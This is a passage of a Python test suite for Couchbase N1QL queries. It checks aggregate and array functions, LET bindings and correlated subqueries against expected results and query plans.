actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['join_mo']))
tmp_groups = {doc['join_mo'] for doc in self.full_list}
expected_result = [{"join_mo": group,
"rate": min([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales'])}
for group in tmp_groups
if min([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) > 0 and
math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) < 100000]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result, expected_result)
def test_max(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT join_mo, MAX(test_rate) as rate FROM %s " % query_bucket + \
"as employees WHERE job_title='Sales' GROUP BY join_mo " + \
"HAVING MAX(employees.test_rate) > 0 and " + \
"SUM(test_rate) < 100000"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['join_mo']))
tmp_groups = {doc['join_mo'] for doc in self.full_list}
expected_result = [{"join_mo": group,
"rate": max([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales'])}
for group in tmp_groups
if max([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) > 0 and
math.fsum([doc['test_rate']
for doc in self.full_list
if doc['join_mo'] == group and
doc['job_title'] == 'Sales']) < 100000]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_mo']))
self._verify_results(actual_result, expected_result)
def test_array_agg_distinct(self):
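        """Check ARRAY_AGG(DISTINCT name) grouped by job_title against the distinct
        set of names per group computed from self.full_list."""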
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_agg(DISTINCT name) as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_list = [{"job_title": group, "names": {x["name"] for x in self.full_list
if x["job_title"] == group}} for group in tmp_groups]
expected_result = self.sort_nested_list(expected_list)
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_array_length(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_length(array_agg(DISTINCT name)) as num_names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"num_names": len({x["name"] for x in self.full_list
if x["job_title"] == group})}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title, array_length(array_agg(DISTINCT test_rate)) as rates" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['job_title']))
expected_result = [{"job_title": group,
"rates": len({x["test_rate"] for x in self.full_list
if x["job_title"] == group})}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_array_append(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT job_title," + \
" array_append(array_agg(DISTINCT name), 'new_name') as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": sorted(set([x["name"] for x in self.full_list
if x["job_title"] == group] + ['new_name']))}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title," + \
" array_append(array_agg(DISTINCT name), 'new_name','123') as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": sorted(set([x["name"] for x in self.full_list
if x["job_title"] == group] + ['new_name'] + ['123']))}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_prepared_array_append(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title," + \
" array_append(array_agg(DISTINCT name), 'new_name') as names" + \
" FROM %s GROUP BY job_title" % query_bucket
self.prepared_common_body()
def test_array_union_symdiff(self):
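        """Check ARRAY_UNION, ARRAY_SYMDIFF, ARRAY_SYMDIFF1 and ARRAY_SYMDIFFN
        (wrapped in ARRAY_SORT) against hard-coded expected arrays for the first
        five documents ordered by meta().id."""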
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select ARRAY_SORT(ARRAY_UNION(["skill1","skill2","skill2010","skill2011"],skills)) as ' \
'skills_union from {0} order by meta().id limit 5'.format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']},
{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']},
{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']},
{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']},
{'skills_union': ['skill1', 'skill2', 'skill2010', 'skill2011']}]
self.assertTrue(actual_result['results'] == expected_result,
f"{actual_result['results']} not matching with {expected_result}")
self.query = 'select ARRAY_SORT(ARRAY_SYMDIFF(["skill1","skill2","skill2010","skill2011"],skills)) as ' \
'skills_diff1 from {0} order by meta().id limit 5'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'skills_diff1': ['skill1', 'skill2']},
{'skills_diff1': ['skill1', 'skill2']},
{'skills_diff1': ['skill1', 'skill2']},
{'skills_diff1': ['skill1', 'skill2']},
{'skills_diff1': ['skill1', 'skill2']}])
self.query = 'select ARRAY_SORT(ARRAY_SYMDIFF1(skills,["skill2010","skill2011","skill2012"],' \
'["skills2010","skill2017"])) as skills_diff2 from {0} order by ' \
'meta().id limit 5'.format(query_bucket)
actual_result1 = self.run_cbq_query()
self.assertTrue(
actual_result1['results'] == [{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff2': ['skill2012', 'skill2017', 'skills2010']}])
self.query = 'select ARRAY_SORT(ARRAY_SYMDIFFN(skills,["skill2010","skill2011","skill2012"],' \
'["skills2010","skill2017"])) as skills_diff3 from {0} order by ' \
'meta().id limit 5'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'skills_diff3': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff3': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff3': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff3': ['skill2012', 'skill2017', 'skills2010']},
{'skills_diff3': ['skill2012', 'skill2017',
'skills2010']}])
def test_let(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select * from %s let x1 = {"name":1} order by meta().id limit 1' % query_bucket
actual_result = self.run_cbq_query()
if "query-testemployee10153.1877827" not in str(actual_result['results']):
self.assertTrue(False, str(actual_result['results']))
self.assertTrue("'x1': {'name': 1}" in str(actual_result['results']))
def test_let_missing(self):
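        """Negative test: a LET binding that reuses the keyspace alias ('o') must
        fail with a 'Duplicate variable ... already in scope' error. Creates a
        temporary index and two documents, and cleans both up afterwards."""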
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
created_indexes = []
try:
self.query = 'CREATE INDEX ix1 on %s(x1)' % query_bucket
self.run_cbq_query()
created_indexes.append("ix1")
self.query = 'INSERT INTO %s VALUES ("k01",{"x1":5, "type":"doc", "x2": "abc"}), ' \
'("k02",{"x1":5, "type":"d", "x2": "def"})' % query_bucket
self.run_cbq_query()
self.query = 'EXPLAIN SELECT x1, x2 FROM %s o LET o = CASE WHEN o.type = "doc" THEN o ELSE MISSING ' \
'END WHERE x1 = 5' % query_bucket
try:
self.run_cbq_query(self.query)
except CBQError as ex:
self.assertTrue(str(ex).find("Duplicate variable o (near line 1, column 57) already in scope.") != -1 or
str(ex).find("Duplicate variable o (near line 1, column 66) already in scope.") != -1,
"Error is incorrect.")
else:
self.fail("There was no errors.")
self.query = 'delete from %s use keys["k01","k02"]' % query_bucket
self.run_cbq_query()
finally:
for idx in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (idx, query_bucket, self.index_type)
self.run_cbq_query()
def test_optimized_let(self):
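        """Check that a LET binding used in the WHERE clause lands in the expected
        plan position: the Filter may reference either the bound name or the
        inlined substr0() expression, and the Let/InitialProject operators carry
        the expected bindings. The actual queries are then run to verify results."""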
self.fail_if_no_buckets()
self.query = 'explain select name1 from ' + self.query_buckets[
0] + ' d let name1 = substr(name[0].FirstName,0,10) WHERE name1 = "employeefi"'
res = self.run_cbq_query()
plan = self.ExplainPlanHelper(res)
for operator in plan['~children'][2]['~child']['~children']:
if operator['#operator'] == 'Filter':
self.assertTrue(operator['condition'] == '(`name1` = "employeefi")' or operator['condition'] == '(substr0((((`d`.`name`)[0]).`FirstName`), 0, 10) = "employeefi")')
if operator['#operator'] == 'Let':
self.assertEqual(operator['bindings'], [{'expr': 'substr0((((`d`.`name`)[0]).`FirstName`), 0, 10)', 'var': 'name1'}])
if operator['#operator'] == 'InitialProject':
self.assertEqual(operator['result_terms'], [{'expr': '`name1`'}])
self.query = 'select name1 from ' + self.query_buckets[
0] + ' d let name1 = substr(name[0].FirstName,0,10) WHERE name1 = "employeefi" limit 2'
res = self.run_cbq_query()
self.assertEqual(res['results'], [{'name1': 'employeefi'}, {'name1': 'employeefi'}])
self.query = 'explain select name1 from ' + self.query_buckets[
0] + ' d let name1 = substr(name[0].FirstName,0,10) WHERE name[0].MiddleName = "employeefirstname-4"'
res = self.run_cbq_query()
plan = self.ExplainPlanHelper(res)
self.assertEqual(plan['~children'][2]['~child']['~children'],
[{'#operator': 'Filter',
'condition': '((((`d`.`name`)[0]).`MiddleName`) = "employeefirstname-4")'},
{'#operator': 'Let', 'bindings': [
{'var': 'name1', 'expr': 'substr0((((`d`.`name`)[0]).`FirstName`), 0, 10)'}]},
{'#operator': 'InitialProject', 'result_terms': [{'expr': '`name1`'}]}])
self.query = 'select name1 from ' + self.query_buckets[0] + \
' let name1 = substr(name[0].FirstName,0,10) WHERE name[0].MiddleName = "employeefirstname-4" ' \
'limit 10 '
res = self.run_cbq_query()
self.assertTrue(res['results'] == [])
def test_correlated_queries(self):
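        """Run a set of correlated subqueries (USE KEYS referencing the outer
        alias) against index ix1 on (x, id), checking both the EXPLAIN plan
        (covering scan on ix1) and the query results. Runs only against the
        default bucket; the helper document and index are dropped in the
        finally block."""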
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
if query_bucket == self.default_bucket_name:
try:
self.query = 'create index ix1 on %s(x,id)' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s (KEY, VALUE) VALUES ' \
'("kk02",{"x":100,"y":101,"z":102,"id":"kk02"})' % query_bucket
self.run_cbq_query()
self.query = 'explain select d.x from {0} d where x in (select raw d.x from {0} b ' \
'use keys ["kk02"])'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x in (select raw d.x from {0} b ' \
'use keys ["kk02"])'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw d.x from {0} ' \
'b use keys[d.id])'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw d.x from {0}' \
' b use keys[d.id])'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw b.x from {0} b where b.x IN (' \
'select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw b.x from {0} b ' \
' where b.x IN (select raw ' \
'd.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw b.x from {0} b where b.x IN (' \
'select raw d.x from {0} c use keys["kk02"] where d.x = b.x))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw b.x from {0} b ' \
' where b.x IN (select raw ' \
'd.x from {0} c use keys["kk02"] where d.x = b.x))'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw b.x from {0} b where b.x IN (' \
'select raw d.x from {0} c use keys["kk02"] where d.x = b.x))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw b.x from {0} b' \
' where b.x IN (select raw ' \
'd.x from {0} c use keys["kk02"] where d.x = b.x))'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x from {0} d where x IN (select raw b.x' \
' from {0} b use keys["kk02"] ' \
'where b.x IN (select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw b.x from {0} b use keys["kk02"] ' \
'where b.x IN (select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select d.x,d.id from {0} d where x IN (select raw b.x from {0} b where ' \
'b.x IN (select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x,d.y from {0} d where x IN (select raw b.x from {0} b where b.x ' \
'IN (select raw d.x from {0} c use keys["kk02"]))'.format(query_bucket)
actual_result = self.run_cbq_query()
diffs = DeepDiff(actual_result['results'], [{'y': 101, 'x': 100}], ignore_order=True)
if diffs:
                        self.fail(diffs)
self.query = 'explain select d.x from {0} d where x IN (select raw (select raw d.x from {0}' \
' c use keys[d.id] where d.x = b.x)[0] from {0} b ' \
'where b.x is not null)'.format(query_bucket)
                    actual_result = self.run_cbq_query()
                    plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select d.x from {0} d where x IN (select raw (select raw d.x from {0} c ' \
'use keys[d.id] where d.x = b.x)[0] from {0} b where b.x ' \
'is not null)'.format(query_bucket)
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == [{'x': 100}])
self.query = 'explain select (select raw d.x from ' + self.query_buckets[0] + \
' c use keys[d.id]) as s, d.x from ' + self.query_buckets[0] + \
' d where x is not null'
actual_result = self.run_cbq_query()
plan = self.ExplainPlanHelper(actual_result)
self.assertTrue("covers" in str(plan))
self.assertTrue(plan['~children'][0]['index'] == 'ix1')
self.query = 'select (select raw d.x from ' + self.query_buckets[0] + \
' c use keys[d.id]) as s, d.x from ' + self.query_buckets[0] + \
' d where x is not null'
actual_result = self.run_cbq_query()
diffs = DeepDiff(actual_result['results'], [{'x': 100, 's': [100]}], ignore_order=True)
self.assertEqual(diffs, {})
finally:
self.query = 'delete from %s use keys["kk02"]' % query_bucket
self.run_cbq_query()
self.query = "DROP INDEX %s ON %s USING %s" % ("ix1", query_bucket, self.index_type)
self.run_cbq_query()
    # This test is not used anywhere
def test_object_concat_remove(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select object_concat({"name":"test"},{"test":123},tasks_points) as obj from %s order by ' \
'meta().id limit 10;' % query_bucket
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'] == (
[{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}},
{'obj': {'test': 123, 'task1': 1, 'task2': 1, 'name': 'test'}}]))
self.query = 'select OBJECT_REMOVE({"abc":1,"def":2,"fgh":3},"def")'
actual_result = self.run_cbq_query()
            self.assertEqual(actual_result['results'], [{'$1': {'abc': 1, 'fgh': 3}}])
def test_array_concat(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title," + \
" array_concat(array_agg(name), array_agg(email)) as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result1 = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group] +
[x["email"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_result1 = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result1, expected_result1)
self.query = "SELECT job_title," + \
" array_concat(array_agg(name), array_agg(email),array_agg(join_day)) as names" + \
" FROM %s GROUP BY job_title limit 10" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group] +
[x["email"] for x in self.full_list
if x["job_title"] == group] +
[x["join_day"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups][0:10]
diffs = DeepDiff(actual_result, expected_result, ignore_order=True)
if diffs:
                self.fail(diffs)
def test_array_prepend(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title," + \
" array_prepend(1.2, array_agg(test_rate)) as rates" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": [x["test_rate"] for x in self.full_list
if x["job_title"] == group] + [1.2]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title," + \
" array_prepend(1.2,2.4, array_agg(test_rate)) as rates" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": [x["test_rate"] for x in self.full_list
if x["job_title"] == group] + [1.2] + [2.4]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title," + \
" array_prepend(['skill5', 'skill8'], array_agg(skills)) as skills_new" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"skills_new": [x["skills"] for x in self.full_list
if x["job_title"] == group] +
[['skill5', 'skill8']]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title," + \
" array_prepend(['skill5', 'skill8'],['skill9','skill10'], array_agg(skills)) as " + \
" skills_new FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"skills_new": [x["skills"] for x in self.full_list
if x["job_title"] == group] +
[['skill5', 'skill8']] + [['skill9', 'skill10']]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_array_remove(self):
self.fail_if_no_buckets()
value = 'employee-1'
for query_bucket in self.query_buckets:
self.query = "SELECT job_title," + \
" array_remove(array_agg(DISTINCT name), '%s') as names" % value + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group and x["name"] != value]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
value1 = 'employee-2'
value2 = 'emp-2'
value3 = 'employee-1'
self.query = "SELECT job_title," + \
" array_remove(array_agg(DISTINCT name), '%s','%s','%s') as " % (value1, value2, value3) + \
" names FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group and x["name"] != value1 and x[
"name"] != value3]}
for group in tmp_groups]
self._verify_results(actual_result, expected_result)
def test_array_insert(self):
value1 = 'skill-20'
value2 = 'skill-21'
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT array_insert(skills, 1, '%s','%s') " % (value1, value2) + \
" FROM %s limit 1" % query_bucket
actual_list = self.run_cbq_query()
expected_result = [{'$1': ['skill2010', 'skill-20', 'skill-21', 'skill2011']}]
self.assertTrue(actual_list['results'] == expected_result)
def test_array_avg(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_avg(array_agg(test_rate))" + \
" as rates FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
for doc in actual_result['results']:
doc['rates'] = round(doc['rates'])
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": round(sum([x["test_rate"] for x in self.full_list
if x["job_title"] == group]) / float(len([x["test_rate"]
for x in self.full_list
if x[
"job_title"] == group])))}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_contains(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_contains(array_agg(name), 'employee-1')" + \
" as emp_job FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": 'employee-1' in [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
self._verify_results(actual_result, expected_result)
def test_array_count(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_count(array_agg(name)) as names" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": len([x["name"] for x in self.full_list
if x["job_title"] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_distinct(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_distinct(array_agg(name)) as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
for item in actual_result:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
def test_array_max(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_max(array_agg(test_rate)) as rates" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": max([x["test_rate"] for x in self.full_list
if x["job_title"] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_sum(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, round(array_sum(array_agg(test_rate))) as rates" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": round(sum([x["test_rate"] for x in self.full_list
if x["job_title"] == group]))}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_min(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_min(array_agg(test_rate)) as rates" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"rates": min([x["test_rate"] for x in self.full_list
if x["job_title"] == group])}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_array_position(self):
self.query = "select array_position(['support', 'qa'], 'dev') as index_num"
actual_result = self.run_cbq_query()
expected_result = [{"index_num": -1}]
self._verify_results(actual_result['results'], expected_result)
self.query = "select array_position(['support', 'qa'], 'qa') as index_num"
actual_result = self.run_cbq_query()
expected_result = [{"index_num": 1}]
self._verify_results(actual_result['results'], expected_result)
def test_array_put(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_put(array_agg(distinct name), 'employee-1') as emp_job" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
for item in actual_result:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
self.query = "SELECT job_title, array_put(array_agg(distinct name), 'employee-50','employee-51') as " + \
" emp_job FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": [x["name"] for x in self.full_list
if x["job_title"] == group] + ['employee-50'] + [
'employee-51']}
for group in tmp_groups]
for item in actual_result:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
self.query = "SELECT job_title, array_put(array_agg(distinct name), 'employee-47') as emp_job" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"job_title": group,
"emp_job": [x["name"] for x in self.full_list
if x["job_title"] == group] + ['employee-47']}
for group in tmp_groups]
for item in actual_result:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
def test_array_range(self):
self.query = "select array_range(0,10) as num"
actual_result = self.run_cbq_query()
expected_result = [{"num": list(range(10))}]
self._verify_results(actual_result['results'], expected_result)
def test_array_replace(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_replace(array_agg(name), 'employee-1', 'employee-47') as emp_job" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
